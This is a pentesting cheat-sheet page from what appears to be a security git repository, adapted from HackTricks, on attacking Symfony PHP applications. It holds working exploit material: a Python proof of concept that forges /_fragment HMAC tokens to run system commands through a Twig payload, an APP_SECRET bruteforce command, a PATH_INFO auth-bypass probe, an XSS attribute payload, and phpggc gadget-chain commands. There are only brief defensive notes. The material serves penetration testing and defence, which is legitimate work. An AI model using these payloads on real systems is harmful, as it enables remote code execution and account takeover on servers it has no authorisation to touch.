daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

symphony.md (10657B)


      1 ---
      2 title: "Symfony"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/symphony.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/symphony.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Symfony
     14 
     15 Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components).  This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.
     16 
     17 > Historical note: A large part of the ecosystem still runs the **5.4 LTS** branch (EOL **November 2025**).  Symfony **7.4** became the new LTS in **Nov 2025** and will receive security fixes until **Nov 2029**.  Always verify the exact patch-level because many 2024‑2026 advisories were fixed only in micro releases.
     18 
     19 ---
     20 
     21 ## Recon & Enumeration
     22 
     23 ### Finger-printing
     24 * HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` or cookies starting with `sf_redirect`, `sf_session`, `MOCKSESSID`.
     25 * Source code leaks (`composer.json`, `composer.lock`, `/vendor/…`) often reveal the exact version:
     26   ```bash
     27   curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
     28   ```
     29 * Public routes that only exist on Symfony:
     30   * `/_profiler`   (Symfony **Profiler** & debug toolbar)
     31   * `/_wdt/<token>` (“Web Debug Toolbar”)  
     32   * `/_error/{code}.{_format}` (pretty error pages)  
     33   * `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers)
     34 * Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: `symfony.txt` → look for `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
     35 
     36 ### Interesting files & endpoints
     37 | Path | Why it matters |
     38 |------|----------------|
     39 | `/.env`, `/.env.local`, `/.env.prod` | Frequently mis-deployed → leaks `APP_SECRET`, DB creds, SMTP, AWS keys |
     40 | `/.git`, `.svn`, `.hg` | Source disclosure → credentials + business logic |
     41 | `/var/log/*.log`, `/log/dev.log` | Web-root mis-configuration exposes stack-traces |
     42 | `/_profiler` | Full request history, configuration, service container, **APP_SECRET** (≤ 3.4) |
     43 | `/_fragment` | Entry point used by ESI/HInclude.  Abuse possible once you know `APP_SECRET` |
     44 | `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE if accessible (CVE-2017-9841) |
     45 | `/index.php/_error/{code}` | Finger-print & sometimes leak exception traces |
     46 
     47 ---
     48 
     49 ## High-impact Vulnerabilities
     50 
     51 ### 1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”)
     52 * **CVE-2019-18889** originally, but *still* appears on modern targets when debug is left enabled or `.env` is exposed.
     53 * Once you know the 32-char `APP_SECRET`, craft an HMAC token and abuse the internal `render()` controller to execute arbitrary Twig:
     54   ```python
     55   # PoC – requires the secret
     56   import hmac, hashlib, requests, urllib.parse as u
     57   secret = bytes.fromhex('deadbeef…')
     58   payload = "{{['id']|filter('system')}}"   # RCE in Twig
     59   query = {
     60       'template': '@app/404.html.twig',
     61       'filter': 'raw',
     62       '_format': 'html',
     63       '_locale': 'en',
     64       'globals[cmd]': 'id'
     65   }
     66   qs = u.urlencode(query, doseq=True)
     67   token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
     68   r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
     69   print(r.text)
     70   ```
     71 * Excellent write-up & exploitation script: Ambionics blog (linked in References).<sup>[[1]](#references)</sup>
     72 
     73 ### 2. PATH_INFO auth bypass – **CVE-2025-64500** (HttpFoundation)
     74 * Affects versions below 5.4.50, 6.4.29 and 7.3.7. Path normalization could drop the leading `/`, breaking access-control rules that assume `/admin` etc.
     75 * Quick test: `curl -H 'PATH_INFO: admin/secret' https://target/index.php` → if it reaches admin routes without auth, you found it.
     76 * Patch by upgrading `symfony/http-foundation` or the full framework to the fixed patch level.<sup>[[5]](#references)</sup>
     77 
     78 ### 3. MSYS2/Git-Bash argument mangling – **CVE-2026-24739** (Process)
     79 * Affects versions below 5.4.51, 6.4.33, 7.3.11, 7.4.5 and 8.0.5 on Windows when PHP is run from MSYS2 (Git-Bash, mingw). `Process` fails to quote `=` leading to corrupted paths; destructive commands (`rmdir`, `del`) may target unintended dirs.<sup>[[4]](#references)</sup>
     80 * If you can upload a PHP script or influence Composer/CLI helpers that call `Process`, craft arguments with `=` (e.g. `E:/=tmp/delete`) to cause path re-write.
     81 
     82 ### 4. Runtime env/argv injection – **CVE-2024-50340** (Runtime)
     83 * When `register_argv_argc=On` and using non-SAPI runtimes, crafted query strings could flip `APP_ENV`/`APP_DEBUG` via `argv` parsing. Patched in 5.4.46/6.4.14/7.1.7.<sup>[[6]](#references)</sup>
     84 * Look for `/?--env=prod` or similar being accepted in logs.
     85 
     86 ### 5. URL validation / open redirect – **CVE-2024-50345** (HttpFoundation)
     87 * Special characters in the URI were not validated the same way browsers do, enabling redirect to attacker-controlled domains. Fixed in 5.4.46/6.4.14/7.1.7.<sup>[[7]](#references)</sup>
     88 
     89 ### 6. Symfony UX attribute injection – **CVE-2025-47946**
     90 * `symfony/ux-twig-component` & `symfony/ux-live-component` before **2.25.1** render `{{ attributes }}` without escaping → attribute injection/XSS. If the app lets users define component attributes (admin CMS, email templating) you can chain to script injection.<sup>[[3]](#references)</sup>
     91 * Update both packages to 2.25.1+. As a manual exploit, place JS in an attribute value passed to a custom component and trigger rendering.
     92 
     93 ### 7. Windows Process Hijack – **CVE-2024-51736** (Process)
     94 * The `Process` component searched the current working directory **before** `PATH` on Windows.  An attacker able to upload `tar.exe`, `cmd.exe`, etc. in a writable web-root and trigger `Process` (e.g. file extraction, PDF generation) gains command execution.<sup>[[2]](#references)</sup>
     95 * Patched in 5.4.50, 6.4.14, 7.1.7.
     96 
     97 ### 8. Session-Fixation – **CVE-2023-46733**
     98 * Authentication guard reused an existing session ID after login.  If an attacker sets the cookie **before** the victim authenticates, they hijack the account post-login.
     99 
    100 ### 9. Twig sandbox XSS – **CVE-2023-46734**
    101 * In applications that expose user-controlled templates (admin CMS, email builder) the `nl2br` filter could be abused to bypass the sandbox and inject JS.
    102 
    103 ### 10. Symfony 1 gadget chains (still found in legacy apps)
    104 * `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`.  Check file-upload endpoints and `phar://` wrappers.
    105 
    106 
    107 [Php Deserialization + Autoload Classes](/hacktricks/pentesting-web/deserialization/php-deserialization-autoload-classes)
    108 
    109 ---
    110 
    111 ## Exploitation Cheat-Sheet
    112 
    113 ### Calculate HMAC token for `/_fragment`
    114 ```bash
    115 python - <<'PY'
    116 import sys, hmac, hashlib, urllib.parse as u
    117 secret = bytes.fromhex(sys.argv[1])
    118 qs     = u.quote_plus(sys.argv[2], safe='=&')
    119 print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
    120 PY deadbeef… "template=@App/evil&filter=raw&_format=html"
    121 ```
    122 
    123 ### Bruteforce weak `APP_SECRET`
    124 ```bash
    125 cewl -d3 https://target -w words.txt
    126 symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
    127 ```
    128 
    129 ### RCE via exposed Symfony Console
    130 If `bin/console` is reachable through `php-fpm` or direct CLI upload:
    131 ```bash
    132 php bin/console about        # confirm it works
    133 php bin/console cache:clear --no-warmup
    134 ```
    135 Use deserialization gadgets inside the cache directory or write a malicious Twig template that will be executed on the next request.
    136 
    137 ### Probe PATH_INFO bypass quickly (CVE-2025-64500)
    138 ```bash
    139 curl -i -H 'PATH_INFO: admin/secret' https://target/index.php
    140 # If it returns protected content without redirect/auth, the Request normalization is vulnerable.
    141 ```
    142 
    143 ### Spray UX attribute injection (CVE-2025-47946)
    144 ```text
    145 {# attacker-controlled attribute value #}
    146 <live:button {{ attributes|merge({'onclick':'alert(1)'}) }} />
    147 ```
    148 If the rendered output echoes the attribute unescaped, XSS succeeds. Patch to 2.25.1+.
    149 
    150 ---
    151 
    152 ## Defensive notes
    153 1. **Never deploy debug** (`APP_ENV=dev`, `APP_DEBUG=1`) to production; block `/app_dev.php`, `/_profiler`, `/_wdt` in the web-server config.
    154 2. Store secrets in env vars or `vault/secrets.local.php`, *never* in files accessible through the document-root.
    155 3. Enforce patch management – subscribe to Symfony security advisories and keep at least the LTS patch-level (5.4.x until Nov 2025, 6.4 until Nov 2027, 7.4 until Nov 2029).
    156 4. If you run on Windows, upgrade immediately to mitigate CVE-2024-51736 & CVE-2026-24739 or add a `open_basedir`/`disable_functions` defence-in-depth.
    157 
    158 ---
    159 
    160 ### Useful offensive tooling
    161 * **ambionics/symfony-exploits** – secret-fragment RCE, debugger routes discovery.
    162 * **phpggc** – Ready-made gadget chains for Symfony 1 & 2.
    163 * **sf-encoder** – small helper to compute `_fragment` HMAC (Go implementation).
    164 
    165 
    166 ## References
    167 
    168 - [1] [Ambionics – Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
    169 - [2] [Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
    170 - [3] [Symfony Blog – CVE-2025-47946: Unsanitized HTML attribute injection in UX components](https://symfony.com/blog/symfony-ux-cve-2025-47946-unsanitized-html-attribute-injection-via-componentattributes)
    171 - [4] [Symfony Blog – CVE-2026-24739: Incorrect argument escaping under MSYS2/Git Bash](https://symfony.com/blog/cve-2026-24739-incorrect-argument-escaping-under-msys2-git-bash-on-windows-can-lead-to-destructive-file-operations)
    172 - [5] [Symfony Blog – CVE-2025-64500: Incorrect parsing of PATH_INFO can lead to limited authorization bypass](https://symfony.com/blog/cve-2025-64500-incorrect-parsing-of-path-info-can-lead-to-limited-authorization-bypass)
    173 - [6] [GitHub Security Advisory – CVE-2024-50340: symfony/runtime allows APP_ENV/APP_DEBUG override via crafted argv parsing](https://github.com/symfony/symfony/security/advisories/GHSA-x8vp-gf4q-mw5j)
    174 - [7] [GitHub Security Advisory – CVE-2024-50345: symfony/http-foundation improper URI validation enables open redirect](https://github.com/symfony/symfony/security/advisories/GHSA-mrqx-rp3w-jpjp)